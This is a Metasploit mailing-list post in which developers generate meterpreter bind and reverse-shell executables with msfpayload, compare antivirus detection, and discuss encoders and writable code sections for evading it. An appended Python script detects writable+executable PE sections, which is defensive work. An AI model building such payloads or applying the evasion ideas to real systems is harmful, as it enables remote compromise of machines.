Metasploit mailing list archives

Connect to a remote windows host with valid credentials (no exploit)
From: mmiller at hick.org (mmiller at hick.org)
Date: Fri, 1 Jun 2007 13:32:17 -0700

On Fri, Jun 01, 2007 at 03:13:01PM -0500, Kurt Grutzmacher wrote:
> On Fri, Jun 01, 2007 at 04:50:23PM +0200, Nicolas FR wrote:
> > - Kaspersky 6.0 detects the payload and blocks the .exe when the exploit is
> > launched (warning about "Buffer Overflow"); Kaspersky does a good job on
> > this, I am positively surprised.
>
> I made a meterpreter listener and reverse and uploaded them to virustotal.com:
>
> $ ./msfpayload windows/meterpreter/bind_tcp LPORT=5512 X > metbind-5512.exe
> $ ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.221.55.2 LPORT=5512 X > metreverse-5512.exe
>
> Only three found them suspicious, Fortinet 2.85.0.0, Panda 9.0.0.4 and
> Webwasher-Gateway 6.0.1 .. That could change in the future. Symantec 10
> used to complain, not sure what changed.  :)
>
> If only a clean EXE would be created with a real exit() call or
> something. Having the debug handler kick in after doing a 'quit' really
> sucks.

I committed a change to trunk to allow you to specify an encoder through
the ENCODER option on the command line (case sensitive).  You might try
generating an executable using an encoder and see what AVs come back
with.  The only problem will be that a number of the encoders assume the
ability to do in-place decoding which won't work with the current
executable template (because the code section is readonly).  It might be
possible for us to modify the template to have the code section be
mapped execute/read/write.  I wonder if AV flags that as suspicious :)
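The question at the end of the message, whether an execute/read/write code section looks suspicious, is exactly the kind of static check a scanner can make from the PE section table alone. The script below is an added example and is not code from this list or from Metasploit: it parses the DOS header, PE signature, COFF header and section headers of a Windows executable, reports each section's mapping permissions, and flags any section that is both writable and executable. The two PE samples it runs on are constructed inline (header-only, not loadable images); the msfpayload executable template itself is not on this page and nothing is assumed about its layout.

```python
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE             = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE          = 0x20000000
IMAGE_SCN_MEM_READ             = 0x40000000
IMAGE_SCN_MEM_WRITE            = 0x80000000


def parse_sections(pe: bytes):
    """Return [(name, characteristics)] for every section in a PE image.

    Walks DOS header -> PE signature -> COFF header -> section table. The
    optional header is skipped using SizeOfOptionalHeader, so PE32 and PE32+
    files are both handled.
    """
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (_machine, n_sections, _stamp, _symtab, _nsyms,
     opt_header_size, _chars) = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_header_size          # COFF header is 20 bytes
    sections = []
    for i in range(n_sections):
        hdr = table + i * 40                      # each section header is 40 bytes
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        (characteristics,) = struct.unpack_from("<I", pe, hdr + 36)
        sections.append((name, characteristics))
    return sections


def perms(characteristics: int) -> str:
    """Render the MEM_READ/WRITE/EXECUTE bits as an rwx string."""
    return ("r" if characteristics & IMAGE_SCN_MEM_READ else "-") + \
           ("w" if characteristics & IMAGE_SCN_MEM_WRITE else "-") + \
           ("x" if characteristics & IMAGE_SCN_MEM_EXECUTE else "-")


def writable_executable_sections(pe: bytes):
    """Names of sections mapped both writable and executable, i.e. the
    kind of .text an in-place decoder would need."""
    rwx = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    return [name for name, c in parse_sections(pe) if c & rwx == rwx]


def build_sample_pe(section_specs):
    """Construct a minimal, non-loadable PE header for testing: a 64-byte DOS
    header whose e_lfanew points straight at the PE signature, a COFF header
    with SizeOfOptionalHeader = 0, and one 40-byte entry per section."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x014C, len(section_specs), 0, 0, 0, 0, 0x0102)
    out = dos + b"PE\0\0" + coff
    for name, chars in section_specs:
        out += name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", 0x1000, 0x1000, 0x200, 0x400, 0, 0, 0, 0, chars)
    return out


# Constructed samples: the usual read/execute .text, and the
# execute/read/write .text that an in-place decoder would require.
NORMAL_PE = build_sample_pe([
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE),
    (b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])
RWX_PE = build_sample_pe([
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ
               | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE),
    (b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])

if __name__ == "__main__":
    for label, sample in (("normal", NORMAL_PE), ("rwx-text", RWX_PE)):
        for name, c in parse_sections(sample):
            print(f"{label:9} {name:8} {perms(c)}")
        print(f"{label:9} flagged: {writable_executable_sections(sample)}")
```

Against a real file, `parse_sections(open(path, "rb").read())` works unchanged because the parser honours SizeOfOptionalHeader rather than assuming a fixed layout. A writable+executable section is only a heuristic signal: packers and some runtimes legitimately produce them, so a scanner would weigh it alongside other indicators rather than treat it as a verdict on its own.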